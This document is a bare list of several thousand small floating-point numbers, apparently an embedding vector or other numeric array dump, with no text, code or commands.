-0.006068625953048468, -0.0013718348927795887, -0.04708748683333397, -0.002863248810172081, 0.03342892602086067, 0.006882426328957081, -0.002976184245198965, -0.03287089243531227, 0.02928352728486061, -0.03473100811243057, 0.02068713866174221, 0.003886312013491988, 0.008250939659774303, -0.01805640384554863, -0.0031754823867231607, -0.004563925322145224, -0.044695910066366196, -0.04854900762438774, 0.023025568574666977, 0.008211079984903336, 0.0007141513633541763, 0.0024796000216156244, -0.02548357844352722, -0.02062070555984974, -0.02758285030722618, 0.023198293522000313, 0.004783153533935547, -0.0010072855511680245, 0.005248181987553835, -0.004909375216811895, 0.0018069690559059381, 0.01666131801903248, 0.0043413760140538216, -0.01740536279976368, -0.008118074387311935, -0.0010371803073212504, 0.0024696351028978825, -0.0018152730772271752, -0.0167277492582798, -0.03236600384116173, -0.0055869887582957745, 0.004610428586602211, 0.026586361229419708, -0.01973050832748413, -0.00944672804325819, 0.005347831174731255, -0.03265830874443054, -0.02875206619501114, -0.0036305461544543505, -0.02411506511271, 0.031489092856645584, 0.0014266419457271695, 0.0017471796600148082, -0.0004010873381048441, 0.031063923612236977, -0.039248429238796234, -0.05054198578000069, 0.029336674138903618, 0.023915765807032585, -0.007486963644623756, 0.016581598669290543, 0.03348207473754883, -0.051923785358667374, 0.013253320939838886, -0.003869703970849514, 0.0469280481338501, 0.007845699787139893, 0.04485534876585007, -0.01335961278527975, 0.011572573333978653, 0.005364439450204372, -0.02322486601769924, -0.029549257829785347, -0.013685133308172226, 0.005995549727231264, 0.03975331783294678, 0.0025443718768656254, -0.0018501502927392721, 0.003906241850927472, -0.03839809074997902, 0.03515617549419403, 0.016501879319548607, 0.001903296448290348, 0.0035308972001075745, 0.008443593978881836, -0.03212684765458107, 0.012303333729505539, 0.03579393029212952, -0.006158309988677502, 0.0025460326578468084, -0.007154799997806549, -0.014681623317301273, -0.020554272457957268, -0.014934067614376545, -0.0026257517747581005, -0.024500373750925064, -0.047884680330753326, 0.017671093344688416, 0.017365504056215286, -0.0023085358552634716, 0.016834042966365814, 0.02529756724834442, -0.008244296535849571, 0.03930157795548439, -0.02612133137881756, 0.007493606768548489, -0.02800801955163479, -0.0037899846211075783, -0.049053896218538284, -0.024619953706860542, -0.010722235776484013, -0.0035508270375430584, -0.017883678898215294, 0.04743293672800064, 0.06919628381729126, -0.003145587630569935, -0.003946101292967796, 0.00034212833270430565, 0.010682376101613045, -0.032605163753032684, 0.0024879041593521833, -0.0082243662327528, 0.044722482562065125, 0.010875030420720577, -0.03765404596924782, 0.008576459251344204, -0.02427450381219387, 0.013386186212301254, -0.01006455160677433, -0.01945148967206478, 0.03916871175169945, 0.008715968579053879, 0.00837716180831194, 0.011639006435871124, -0.0121970409527421, 0.036963146179914474, 0.005606918595731258, -0.0063941460102796555, -0.023304585367441177, -0.003034312976524234, -0.02516470104455948, 0.00027216642047278583, -0.016687890514731407, 0.0066598765552043915, 0.01162572018802166, -0.016834042966365814, -0.007573326118290424, -0.0077327643521130085, -0.03975331783294678, -0.0016608171863481402, 0.031834542751312256, -0.01765780709683895, -0.018003256991505623, -0.012980946339666843, 0.002119202632457018, -0.015080219134688377, -0.017724240198731422, 0.015638254582881927, -0.04020506143569946, -0.030346451327204704, -0.011971170082688332, -0.015412382781505585, 0.0033631545957177877, 0.012256829999387264, -0.008430307731032372, -0.03454499691724777, -0.026666080579161644, 0.012495988048613071, -0.011393205262720585, 0.002765260636806488, 0.0007702039438299835, 0.03799949586391449, 0.008018424734473228, 0.009001628495752811, 0.04031135514378548, -0.066166952252388, -0.017485082149505615, 0.016621457412838936, 0.0184948593378067, -0.025682875886559486, 0.03194083645939827, -0.016860615462064743, -0.033933814615011215, 0.010084481909871101, -0.01691376231610775, 0.03611280769109726, -0.012509274296462536, 0.006696414668112993, -0.01684732921421528, -0.030745046213269234, 0.00042205516365356743, 0.005128603428602219, 0.028433188796043396, 0.01482777576893568, -0.01945148967206478, -0.023264726623892784, -0.00908799096941948, -0.0018086298368871212, -0.03784005716443062, 0.021789921447634697, -0.03273802623152733, 0.04086938872933388, 0.015146652236580849, -0.07328853756189346, 0.002994453301653266, 0.0005264790379442275, -0.006722987629473209, 0.020979441702365875, 0.013592127710580826, 0.002085986314341426, -0.022427674382925034, 0.010675732977688313, -0.0541824996471405, -0.06053346395492554, -0.031090496107935905, 0.0323394313454628, -0.011851591058075428, -0.0003342394484207034, 0.01619628816843033, 0.006111807189881802, 0.023490596562623978, -0.03762747347354889, -0.029230382293462753, 0.06606066226959229, 0.0030326521955430508, 0.03215342015028, -0.033774375915527344, -0.043181244283914566, 0.027848580852150917, -0.03249887004494667, 0.011087615042924881, -0.04466933757066727, -0.016010276973247528, 0.00592911709100008, 0.006975431926548481, -0.006211455911397934, 0.005045562516897917, 0.03898270055651665, -0.012622210197150707, -0.002864909591153264, -0.015186511911451817, 0.008211079984903336, 0.003853095695376396, 0.028805213049054146, 0.039221856743097305, 0.021444471552968025, 0.023317871615290642, 0.022427674382925034, 0.015465528704226017, -0.03911556676030159, 0.005357795860618353, 0.02853948064148426, 0.020421408116817474, -0.0008544904412701726, -0.009499873965978622, -0.0027287225238978863, -0.019491350278258324, 0.01756480149924755, -0.005377725698053837, -0.017392076551914215, -0.004600463435053825, 0.04727349802851677, -0.004401165526360273, -0.0026456816121935844, -0.01088167354464531, -0.02655978687107563, -0.020726997405290604, 0.039195284247398376, 0.01092817634344101, -0.02581574209034443, -0.03571421280503273, 0.045838553458452225, -0.05163148418068886, -0.018481573089957237, 0.016129855066537857, -0.03741488978266716, -0.011957882903516293, -0.016993481665849686, -0.006085233762860298, 0.025855600833892822, 0.004726685583591461, -0.0018185947556048632, 0.025589870288968086, -0.024619953706860542, 0.024752818048000336, 0.020567558705806732, -0.02795487456023693, -0.022985709831118584, 0.012376409024000168, 0.005221609026193619, 0.000986525323241949, 0.011007895693182945, -0.00981875043362379, -0.008888693526387215, 0.01854800619184971, 0.035820502787828445, -0.0014216594863682985, -0.019424917176365852, 0.004643644671887159, -0.044509898871183395, -0.003115692874416709, -0.028778638690710068, -0.03497016429901123, -0.01586412452161312, -0.02581574209034443, -0.011778514832258224, 0.012143895030021667, 0.030718473717570305, 0.02152419090270996, 0.002140793250873685, 0.04408473148941994, 0.004852907732129097, 0.022068938240408897, -0.032259710133075714, 0.01020406000316143, 0.002227155724540353, -0.03597994148731232, 0.017272498458623886, 0.0510203018784523, -0.0074670338071882725, 0.009167710319161415, -0.03720230236649513, 0.0024679743219166994, -0.011984456330537796, 0.02155076339840889, -0.022533966228365898, -0.015133365988731384, 0.0325254425406456, -0.01090160384774208, -0.07265078276395798, 0.015531961806118488, -0.004935948643833399, 0.011452995240688324, -0.020368261262774467, 0.008397091180086136, -0.045067932456731796, -0.001871740911155939, -0.005686637945473194, 0.040337927639484406, -0.0005094556836411357, -0.017631234601140022, -0.003255201503634453, 0.022095510736107826, 0.03281774744391441, -0.007254449184983969, 0.022241663187742233, 0.017644520848989487, -0.020766858011484146, 0.029336674138903618, 0.036723989993333817, 0.005965655203908682, -0.001439098035916686, -0.03481072559952736, 0.013273250311613083, 0.010735522024333477, -0.028858358040452003, 0.0028167457785457373, 0.0037135870661586523, 0.009911756962537766, 0.01994309201836586, -0.016023563221096992, -0.0026058221701532602, -0.006829279940575361, -0.00894848257303238, -0.010303709656000137, 0.007307595573365688, -0.031861115247011185, 0.003946101292967796, 0.0121970409527421, 0.03948758915066719, -0.04466933757066727, -0.013724992983043194, -0.014389319345355034, -0.0005281398189254105, -0.022706691175699234, -0.016408873721957207, 0.00741388788446784, 0.014256454072892666, -0.011452995240688324, -0.030373023822903633, -0.00992504321038723, -0.03210027515888214, 0.016276007518172264, -0.001351074781268835, -0.027662569656968117, -0.005464088171720505, 0.0015213084407150745, 0.08104787766933441, -0.027104536071419716, 0.0025991788133978844, 0.03199398145079613, 0.010011405684053898, 0.032047126442193985, 0.011678866110742092, -0.005268111824989319, -0.00894848257303238, -0.029389819130301476, 0.012223614379763603, -0.030745046213269234, 0.006822636816650629, -0.0025344069581478834, -0.01978365331888199, 0.001871740911155939, 0.025709448382258415, 0.02525770664215088, -0.03433241322636604, 0.001523799728602171, -0.012622210197150707, -0.028645774349570274, -0.040151916444301605, -0.009147780947387218, 0.01787039265036583, -0.04671546444296837, -0.012515918351709843, 0.018627725541591644, -0.007241162471473217, 0.009513160213828087, 0.021936072036623955, 0.04567911475896835, -0.04086938872933388, 0.008556529879570007, 0.00404242891818285, 0.014508898369967937, -0.034837301820516586, -0.015199798159301281, 0.011526070535182953, -0.00997154600918293, -0.009905112907290459, 0.028247177600860596, 0.011452995240688324, 0.02986813522875309, -0.0022570504806935787, 0.0353156141936779, -0.0063077835366129875, 0.04342040419578552, -0.0016525130486115813, 0.049638502299785614, -0.023331159725785255, -0.00899498537182808, -0.05516570061445236, 0.012569064274430275, -0.0244870875030756, 0.017139632254838943, 0.019092753529548645, 0.001503869891166687, 0.06962145119905472, 0.01938505843281746, -0.016674604266881943, -0.01975708082318306, 0.006590122357010841, -0.015425669960677624, -0.0006580987828783691, -0.017458509653806686, -0.01852143183350563, -0.015638254582881927, -0.010921533219516277, 0.007566682994365692, 0.005656742956489325, -0.007121583912521601, -0.020142389461398125, -0.024247929453849792, 0.010290422476828098, -0.008436950854957104, 0.03292403742671013, -0.022281521931290627, 0.04134770482778549, 0.011094258166849613, 0.007021934725344181, -0.007088367361575365, 0.0157976932823658, 0.00377669814042747, -0.014043869450688362, 0.014070442877709866, 0.019677361473441124, 0.0042051891796290874, 0.011971170082688332, 0.03799949586391449, 0.0328974649310112, -0.008935196325182915, 0.00301438313908875, -0.057185254991054535, 0.012462771497666836, -0.044111303985118866, -0.010037979111075401, 0.01131348591297865, -0.003829844295978546, -0.009619452990591526, 0.0033614938147366047, 0.019557783380150795, -0.011293556541204453, 0.008191149681806564, 0.017524942755699158, 0.013293180614709854, -0.024752818048000336, -0.004730007145553827, -0.01510679256170988, 0.03635196387767792, 0.008729254826903343, 0.00029105821158736944, -0.005480696447193623, 0.014402606524527073, 0.015319377183914185, -0.004231762140989304, -0.026320630684494972, 0.005248181987553835, -0.0025045122019946575, -0.0120110297575593, 0.028406616300344467, -0.030585607513785362, -0.013738279230892658, -0.005650099832564592, -0.030187012627720833, -0.013406115584075451, 0.01446903869509697, -0.005988906603306532, 0.0247661042958498, 0.01880045048892498, 0.004683504346758127, 0.00019327759218867868, 0.009214213117957115, -0.022680118680000305, 0.015120078809559345, -0.0078523438423872, 0.003077494213357568, 0.0006145023507997394, 0.006693093106150627, 0.004464276600629091, 0.0015013787196949124, -0.015252944082021713, 0.03746803477406502, -0.025217847898602486, -0.030851339921355247, -0.011758585460484028, 0.017857106402516365, 0.003009400563314557, -0.033189769834280014, -0.013764852657914162, 0.024619953706860542, -0.041879165917634964, -0.037547752261161804, -0.002939646365121007, 0.0031954122241586447, -0.02909751608967781, -0.06202155351638794, -0.024287790060043335, 0.03244572505354881, 0.019770367071032524, 0.0044044870883226395, -0.016621457412838936, 0.011233767494559288, -0.02096615545451641, -0.05484682321548462, -0.01157921738922596, -0.004198545590043068, -0.009612809866666794, -0.022002505138516426, 0.0007170577882789075, 0.023610176518559456, 0.02006267011165619, 0.0008138003759086132, 0.0012223614612594247, 0.02525770664215088, -0.003266827203333378, -0.0017538229003548622, 0.016594884917140007, -0.0027519739232957363, 0.018680870532989502, 0.001377647859044373, -0.026945097371935844, 0.09406868368387222, 0.028698919340968132, 0.0495322085916996, 0.02238781563937664, 0.0037468033842742443, -0.010323639027774334, -0.01873401738703251, -0.010164201259613037, -0.005048884078860283, 0.004261656664311886, -0.010283779352903366, -0.005400977097451687, -0.0121970409527421, 0.03358836472034454, 0.0332694873213768, 0.03592679649591446, 0.007659688591957092, 0.009533090516924858, 0.00549730472266674, 0.01747179590165615, 0.0079453494399786, 0.008370518684387207, 0.004613750148564577, -0.01097467914223671, 0.0013975775800645351, -0.01369841955602169, -0.00860967580229044, -0.017445223405957222, 0.032605163753032684, -0.014801202341914177, 0.0006008006166666746, -0.012642139568924904, 0.007168086711317301, 0.01157921738922596, 0.03098420426249504, -0.015930557623505592, -0.0065735140815377235, 0.009652669541537762, -0.013412758708000183, 0.0031306403689086437, 0.004148721229285002, 0.0008636249112896621, -0.01707320101559162, 0.02984156273305416, -0.01171872578561306, 0.021936072036623955, -0.02198921889066696, -0.0017189456848427653, -0.0032867570407688618, -0.06414739787578583, -0.025363998487591743, 0.017883678898215294, 0.0008362214430235326, -0.037122584879398346, 0.009180997498333454, -0.020049383863806725, 0.0012481040321290493, 0.005424228962510824, 0.008729254826903343, 0.009094635024666786, -0.0023185007739812136, -0.007918776012957096, 0.03061218187212944, 0.010522937402129173, 0.003663762705400586, 0.04836299642920494, -0.010037979111075401, -0.0157046876847744, -0.024845823645591736, 0.009612809866666794, 0.026692653074860573, 0.006211455911397934, 0.011207194067537785, 0.05062170699238777, 0.00842366460710764, 0.010489720851182938, -0.018694156780838966, -0.022746551781892776, -0.0024712958838790655, 0.056813232600688934, 0.010921533219516277, 0.02464652620255947, 0.020554272457957268, -0.01595713011920452, 0.010410001501441002, -0.010861744172871113, 0.02560315653681755, -0.006400789134204388, -0.01026384998112917, -0.01969064772129059, 0.038637250661849976, 0.014973927289247513, -0.005317936651408672, 0.006487151607871056, -0.014894207939505577, 0.01670117676258087, -0.02451365999877453, -0.0033897277899086475, -0.012203684076666832, 0.010363498702645302, 0.0042749433778226376, 0.04142742231488228, 0.021125594154000282, 0.018295561894774437, 0.031037351116538048, -0.0119180241599679, -0.007095010951161385, 0.036192525178194046, -0.00051402288954705, -0.029230382293462753, -0.01737879030406475, 0.02838004380464554, 0.005949046928435564, -0.008682752028107643, -0.017272498458623886, 0.022055651992559433, 0.016435446217656136, -0.0016882206546142697, -0.017910251393914223, -0.025842314586043358, -0.021351465955376625, -0.030187012627720833, -0.0003579061012715101, -0.008111431263387203, -0.012024316005408764, -0.013027449138462543, 0.001901635667309165, -0.019836800172924995, 0.007015291601419449, -0.007055151276290417, 0.018348706886172295, -0.0030758334323763847, 0.027476558461785316, -0.004746615421026945, -0.003067529294639826, 0.0499042347073555, -0.01694033481180668, -0.020275255665183067, -0.02832689695060253, -0.009885183535516262, -0.0037899846211075783, -0.006178239826112986, 0.006669841706752777, 0.003886312013491988, 0.006540297996252775, 0.024194784462451935, -0.01789696514606476, -0.020793430507183075, -0.017976684495806694, 0.007261092308908701, 0.01510679256170988, -0.021231885999441147, -0.02115216664969921, -0.021683627739548683, -0.018282275646924973, -0.00774605106562376, -0.0003211605071555823, 0.035421907901763916, 0.008443593978881836, -0.01485434826463461, -0.0082708690315485, 0.02287941612303257, 0.015850838273763657, 0.0121970409527421, -0.031489092856645584, 0.00224874634295702, 0.05144547298550606, 0.002884839428588748, 0.02832689695060253, 0.015731260180473328, 0.026360489428043365, 0.007805840577930212, 0.03199398145079613, -0.009506517089903355, 0.01360541395843029, 0.0007178881787694991, -0.020859863609075546, -0.01889345608651638, 0.02266683243215084, -0.027290547266602516, 0.005420906934887171, -0.01037678588181734, 0.013924290426075459, 0.03404010832309723, 0.004191902466118336, -0.010522937402129173, 0.007028578314930201, -0.023942340165376663, 0.023171721026301384, -0.0162627212703228, -0.03026673197746277, -0.007035221438854933, 0.0077327643521130085, 0.02399548515677452, -0.0024829215835779905, -0.0024513660464435816, 0.006058660801500082, -0.007832413539290428, -0.005161819513887167, -0.0042284405790269375, -0.0016774253454059362, -0.012828151695430279, -0.013379543088376522, -0.02686537802219391, -0.012170467525720596, -0.012907871045172215, 0.014934067614376545, -0.01805640384554863, 0.002733705099672079, -0.018747303634881973, 0.0259751807898283, 0.0033299382776021957, 0.019132614135742188, -0.004098896868526936, 0.007546753156930208, -0.002047787420451641, -0.023384304717183113, -0.04493506997823715, -0.016315868124365807, -0.02371646836400032, -0.017764100804924965, 0.01756480149924755, 0.004152042791247368, -0.016887187957763672, 0.03021358512341976, -0.005978941451758146, 0.011658935807645321, 0.025855600833892822, 0.017113059759140015, 0.011692152358591557, 0.011851591058075428, -0.02189621329307556, -0.007785910740494728, 0.03361493721604347, 0.03776033967733383, -0.0006568531971424818, -0.021032588556408882, -0.03837151825428009, 0.00924742966890335, -0.014960641041398048, 0.0023251438979059458, -0.0025676232762634754, -0.005939082242548466, 0.029575832188129425, -0.022308096289634705, 0.004856229294091463, -0.004268300253897905, -0.021072447299957275, -0.008417021483182907, -0.01935848407447338, 0.0034412131644785404, -0.032206565141677856, -0.029336674138903618, 0.008124717511236668, -0.005709889344871044, -0.030585607513785362, 0.02553672343492508, 0.009367008693516254, 0.050382547080516815, -0.013186887837946415, -0.0004388709203340113, 0.00006456426490331069, -0.031063923612236977, 0.011506141163408756, 0.022560540586709976, 0.04594484344124794, 0.0347575806081295, -0.00566670810803771, -0.014668337069451809, 0.011592503637075424, 0.011871520429849625, 0.013964150100946426, 0.006161631550639868, 0.0054109422490000725, 0.00006887201016070321, 0.01632915437221527, -0.003168839029967785, -0.010522937402129173, 0.00746039068326354, 0.023052141070365906, -0.016541738063097, -0.0042716218158602715, -0.016594884917140007, 0.011247053742408752, 0.0004824673815164715, 0.0041852593421936035, -0.00595901207998395, 0.00958623643964529, -0.03063875436782837, -0.03409325331449509, -0.006095198914408684, 0.027476558461785316, 0.022746551781892776, 0.0010006423108279705, -0.02455352060496807, -0.010968036018311977, -0.029017796739935875, 0.029522685334086418, -0.0264402087777853, 0.001974711660295725, -0.02504512295126915, 0.037308596074581146, 0.009519803337752819, 0.053225867450237274, -0.017551515251398087, 0.014535471796989441, -0.01808297634124756, -0.009313862770795822, -0.015571821480989456, -0.002921377308666706, -0.010516294278204441, -0.0004199791292194277, -0.002041144296526909, -0.0026025003753602505, -0.023663323372602463, 0.0007556718192063272, -0.01078866794705391, 0.0010504667880013585, 0.0162627212703228, 0.016873901709914207, 0.015425669960677624, 0.0043181246146559715, -0.004879480693489313, -0.013273250311613083, -0.024819251149892807, 0.0025427110958844423, -0.034890446811914444, 0.012276760302484035, -0.012655426748096943, -0.00981875043362379, -0.010011405684053898, -0.0012871333165094256, 0.019438203424215317, 0.016129855066537857, -0.012476058676838875, -0.026612933725118637, -0.005460766609758139, -0.009426797740161419, 0.004421095363795757, -0.017883678898215294, -0.05702581629157066, -0.01805640384554863, 0.0015761154936626554, -0.013671847060322762, -0.018813736736774445, 0.022241663187742233, 0.019929805770516396, 0.02031511440873146, 0.07041864842176437, -0.00626792386174202, -0.010164201259613037, -0.006301140412688255, 0.000480806571431458, 0.012276760302484035, -0.00032261371961794794, -0.0314093753695488, 0.011552643962204456, -0.010011405684053898, 0.04570568725466728, 0.0023766292724758387, 0.02928352728486061, 0.008689395152032375, -0.01703334040939808, 0.016993481665849686, 0.027343694120645523, -0.006400789134204388, 0.03914213925600052, -0.0044941711239516735, 0.019557783380150795, 0.011207194067537785, 0.011805088259279728, -0.010728878900408745, -0.01137991901487112, -0.024101778864860535, -0.028061166405677795, 0.023703182116150856, 0.0024048632476478815, 0.0035707568749785423, -0.006862496491521597, -0.02173677459359169, -0.0035109673626720905, -0.010509651154279709, -0.008104787208139896, 0.005832789931446314, 0.030319876968860626, -0.012735146097838879, -0.002034500939771533, -0.024473801255226135, 0.008436950854957104, 0.011639006435871124, -0.02835346944630146, -0.013525694608688354, -0.011087615042924881, -0.015332663431763649, 0.006995361763983965, 0.022361241281032562, -0.019132614135742188, 0.0017654486000537872, 0.02006267011165619, -0.025244420394301414, 0.013306466862559319, 0.02621433697640896, -0.02800801955163479, 0.012077461928129196, 0.0006207303958944976, 0.016501879319548607, 0.0014681622851639986, 0.0012198701733723283, 0.004666896071285009, 0.010841813869774342, -0.008709325455129147, -0.008390448056161404, 0.019185759127140045, -0.01694033481180668, -0.014987213537096977, 0.010336926206946373, 0.010011405684053898, 0.015292803756892681, 0.00026261669700033963, -0.01558510772883892, 0.0340135358273983, -0.002879856852814555, 0.005175106227397919, -0.002982827601954341, -0.0031323011498898268, 0.017325643450021744, 0.0062147774733603, -0.0072013032622635365, 0.013054022565484047, -0.003677049186080694, 0.010602656751871109, 0.012701929546892643, -0.009778891690075397, 0.004421095363795757, -0.02548357844352722, -0.019119326025247574, -0.024500373750925064, -0.016183001920580864, -0.0036006516311317682, 0.0083638746291399, -0.00048620422603562474, 0.0017006767448037863, -0.011871520429849625, 0.004929305054247379, 0.01426974032074213, 0.005673351231962442, -0.024447228759527206, -0.013120455667376518, -0.012562421150505543, 0.007858986966311932, 0.018202556297183037, 0.002952932845801115, -0.011419778689742088, -0.011705439537763596, 0.00981875043362379, 0.007168086711317301, -0.02838004380464554, 0.0035873649176210165, -0.0042516919784247875, -0.010383429005742073, 0.02497868984937668, -0.0066366251558065414, 0.005447480361908674, -0.00024310211301781237, -0.00640743225812912, -0.008044998161494732, 0.007832413539290428, 0.0018634367734193802, -0.019212333485484123, -0.024247929453849792, 0.010456504300236702, -0.01181173138320446, 0.0006718005170114338, 0.011539357714354992, -0.015731260180473328, 0.003079154994338751, 0.018933314830064774, 0.03021358512341976, 0.007772624026983976, -0.00837716180831194, 0.01709977351129055, -0.0014831096632406116, 0.010954749770462513, -0.022002505138516426, 0.021590622141957283, 0.00949323084205389, -0.004371270537376404, -0.010875030420720577, 0.005327901337295771, 0.03132965415716171, -0.006370894610881805, 0.014004009775817394, -0.009074704721570015, -0.002869891934096813, 0.01861443929374218, -0.008875406347215176, 0.014628477394580841, 0.0025825705379247665, 0.017538229003548622, -0.02814088575541973, -0.004078967031091452, 0.006849209778010845, 0.002084325533360243, 0.019717220216989517, 0.007985209114849567, -0.017578087747097015, 0.01817598193883896, -0.0074670338071882725, 0.00425833510234952, 0.015173225663602352, 0.03558134660124779, -0.011486210860311985, 0.032233137637376785, -0.011878164485096931, 0.02337101846933365, -0.020567558705806732, -0.0001926547847688198, -0.0061516668647527695, 0.023703182116150856, -0.002825049916282296, -0.029256954789161682, -0.020580844953656197, 0.016674604266881943, 0.0227199774235487, -0.015093506313860416, -0.008191149681806564, 0.022082224488258362, 0.011751942336559296, -0.014455752447247505, 0.008264225907623768, 0.014668337069451809, 0.03459814190864563, 0.015837552025914192, -0.037521179765462875, 0.015425669960677624, -0.010582726448774338, -0.03154223784804344, 0.010130984708666801, 0.017817245796322823, 0.044164448976516724, -0.012363122776150703, -0.012954373843967915, 0.00992504321038723, -0.01798997074365616, -0.0008669465314596891, 0.02553672343492508, 0.00967924203723669, -0.026546500623226166, 0.010463148355484009, -0.006517046596854925, -0.00041790312388911843, -0.025151414796710014, -0.017551515251398087, -0.03778691217303276, -0.022161943838000298, 0.014987213537096977, -0.0009250751463696361, 0.009499873965978622, -0.0032053771428763866, -0.006789420265704393, 0.002036161720752716, -0.02965555153787136, 0.02071371115744114, 0.002057752339169383, -0.009705815464258194, -0.030505888164043427, -0.022281521931290627, 0.02380947396159172, -0.011931310407817364, -0.004055715631693602, -0.00456724688410759, 0.015810979530215263, 0.0010454843286424875, -0.0008150460198521614, 0.015120078809559345, -0.007726121228188276, -0.005444158334285021, 0.013439332135021687, -0.00413543451577425, -0.003916206769645214, 0.002120863413438201, 0.007347454782575369, -0.0016151446616277099, -0.025669589638710022, 0.016036849468946457, -0.006590122357010841, 0.0046037849970161915, 0.023238154128193855, 0.03305690363049507, 0.0037135870661586523, -0.016010276973247528, -0.003902920288965106, 0.02819403074681759, -0.00015850423369556665, -0.001490583410486579, 0.037733763456344604, -0.016462018713355064, 0.02050112746655941, -0.018747303634881973, 0.004666896071285009, 0.010841813869774342, -0.008397091180086136, -0.0015678113559260964, -0.015624967403709888, -0.014309599995613098, 0.01341940276324749, 0.0011384901590645313, 0.00008843851537676528, 0.01510679256170988, -0.009984832257032394, 0.015226371586322784, 0.01957106962800026, 0.004640323109924793, 0.04161343351006508, -0.002977845026180148, -0.020168963819742203, 0.0073142386972904205, -0.012024316005408764, -0.00108783517498523, 0.023875907063484192, -0.02157733589410782, -0.001047975616529584, -0.018388567492365837, 0.015638254582881927, -0.009699172340333462, -0.007121583912521601, -0.0008951804484240711, 0.0031422660686075687, -0.008357231505215168, 0.03063875436782837, -0.024699673056602478, -0.04424417018890381, 0.00454399548470974, -0.007307595573365688, 0.008044998161494732, 0.01966407522559166, 0.01185823418200016, -0.007008648477494717, -0.01360541395843029, -0.002187296049669385, 0.00020376150496304035, -0.031223362311720848, 0.011094258166849613, -0.030080720782279968, -0.02173677459359169, 0.03988618403673172, -0.011413135565817356, 0.003839809214696288, 0.0027735645417124033, 0.005613561719655991, 0.008144646883010864, -0.006792742293328047, -0.010150914080440998, -0.001498887431807816, 0.019305339083075523, -0.006829279940575361, -0.007307595573365688, -0.002879856852814555, -0.0017471796600148082, -0.002026196802034974, 0.007075081113725901, 0.0037268735468387604, 0.014508898369967937, -0.022919276729226112, -0.01355891115963459, -0.023862620815634727, 0.0011443030089139938, -0.029389819130301476, -0.013724992983043194, 0.026918524876236916, -0.02776886150240898, -0.004019177518785, 0.006982075050473213, 0.006068625953048468, 0.009380294941365719, -0.011712082661688328, 0.009300575591623783, -0.023490596562623978, 0.006251315586268902, 0.03231285884976387, 0.04201202839612961, -0.020168963819742203, -0.000020409885109984316, -0.007672975305467844, 0.005739783868193626, -0.00404242891818285, 0.0009051453089341521, 0.013671847060322762, -0.023676609620451927, 0.01994309201836586, 0.008496740832924843, 0.01917247287929058, -0.007095010951161385, -0.03079819306731224, 0.012974303215742111, 0.014030583202838898, -0.014508898369967937, -0.008882050402462482, -0.02851290814578533, -0.01446903869509697, 0.004726685583591461, 0.008171220310032368, 0.01987665891647339, 0.009479944594204426, 0.0045141009613871574, 0.02136475220322609, 0.011851591058075428, 0.0012854724191129208, -0.012070818804204464, -0.007261092308908701, -0.004128791391849518, 0.00013411098916549236, 0.0006933911354281008, 0.013240033760666847, -0.014761342667043209, -0.0033332600723952055, -0.00542755052447319, 0.0011326773092150688, -0.0015752851031720638, 0.009101278148591518, 0.013671847060322762, 0.028406616300344467, 0.003067529294639826, 0.03063875436782837, 0.0073806713335216045, -0.01935848407447338, 0.006809350103139877, 0.0034544996451586485, -0.009998119436204433, 0.00862960610538721, 0.0263472031801939, 0.019185759127140045, -0.014694909565150738, -0.001031367457471788, -0.023782901465892792, 0.007075081113725901, 0.004749936982989311, 0.003212020266801119, 0.03892955183982849, 0.016315868124365807, -0.005417585372924805, 0.005138568114489317, -0.0033166517969220877, 0.035421907901763916, 0.01691376231610775, 0.01957106962800026, -0.008204436860978603, -0.008755828253924847, 0.01759137585759163, -0.006055339239537716, 0.004706755746155977, 0.01281486451625824, -0.010728878900408745, -0.021630482748150826, -0.004570568911731243, 0.00853660050779581, 0.01456204429268837, 0.006032087840139866, 0.007048507686704397, 0.010283779352903366, 0.0034146399702876806, 0.01369841955602169, 0.004849586170166731, 0.012263474054634571, 0.007938706316053867, 0.008596389554440975, 0.004733328707516193, -0.004138756077736616, 0.004866193979978561, 0.007832413539290428, -0.021843066439032555, -0.0015595073346048594, -0.012495988048613071, 0.00011729521065717563, -0.008828903548419476, 0.00320371612906456, -0.003975996281951666, 0.022308096289634705, -0.022361241281032562, 0.01614314317703247, 0.00953973364084959, 0.007281022146344185, -0.0008324845694005489, -0.0014615190448239446, 0.007739407941699028, -0.0034810726065188646, -0.009626096114516258, 0.013472548685967922, 0.005915830843150616, -0.0011700456961989403, -0.001994641264900565, -0.013366255909204483, 0.016953621059656143, -0.02442065440118313, 0.015903985127806664, 0.009858610108494759, 0.013764852657914162, -0.014309599995613098, 0.031861115247011185, 0.005484018009155989, 0.010177487507462502, 0.0009367008460685611, -0.0027287225238978863, 0.011373275890946388, -0.000943344144616276, 0.011014538817107677, -0.025643017143011093, 0.015717973932623863, 0.0079453494399786, -0.002768582198768854, 0.003956066444516182, -0.012668712995946407, 0.004122148267924786, 0.013950863853096962, -0.0034544996451586485, 0.01682075671851635, -0.02350388467311859, -0.027476558461785316, 0.022494107484817505, 0.01142642181366682, 0.0005480696563608944, -0.008676108904182911, 0.02176334708929062, -0.014110302552580833, -0.0035242538433521986, -0.014761342667043209, 0.025430431589484215, -0.009998119436204433, 0.0075799692422151566, 0.023264726623892784, -0.013399472460150719, -0.005822824779897928, -0.005357795860618353, 0.02986813522875309, 0.0009574610739946365, 0.019464775919914246, 0.010795311070978642, -0.0033365816343575716, -0.013047379441559315, 0.002791833598166704, -0.0046934690326452255, 0.008569816127419472, -0.020607419312000275, -0.00039568968350067735, 0.003064207499846816, 0.018322134390473366, 0.01369841955602169, 0.013279893435537815, -0.018906742334365845, -0.03236600384116173, -0.016276007518172264, 0.0024032024666666985, 0.005816181655973196, 0.021975932642817497, -0.024447228759527206, 0.014389319345355034, 0.007128227036446333, -0.02578916773200035, -0.006653233431279659, -0.00416532950475812, -0.007958635687828064, -0.0024364187847822905, 0.00452074408531189, 0.023384304717183113, -0.024061918258666992, 0.011293556541204453, -0.016873901709914207, 0.02313186042010784, 0.0016599866794422269, 0.004902732092887163, -0.013399472460150719, -0.014668337069451809, 0.0006668180576525629, 0.02609475888311863, 0.02436750940978527, 0.010104411281645298, -0.03704286366701126, -0.02062070555984974, 0.019557783380150795, 0.003836487652733922, -0.0036371895112097263, -0.0037036221474409103, -0.007639758754521608, -0.0014116945676505566, -0.008277512155473232, 0.00779255386441946, 0.000702940858900547, -0.004683504346758127, -0.012841437943279743, -0.016953621059656143, 0.00765304546803236, 0.0362456738948822, -0.014455752447247505, 0.006058660801500082, 0.022733265534043312, 0.004148721229285002, -0.022494107484817505, 0.0008096483652479947, 0.016408873721957207, -0.005935760214924812, -0.0034877159632742405, -0.006410754285752773, 0.021564049646258354, 0.005351152736693621, 0.004407808650285006, 0.001356057240627706, 0.0023234831169247627, 0.004723364021629095, 0.00430483790114522, 0.006739595904946327, 0.004723364021629095, 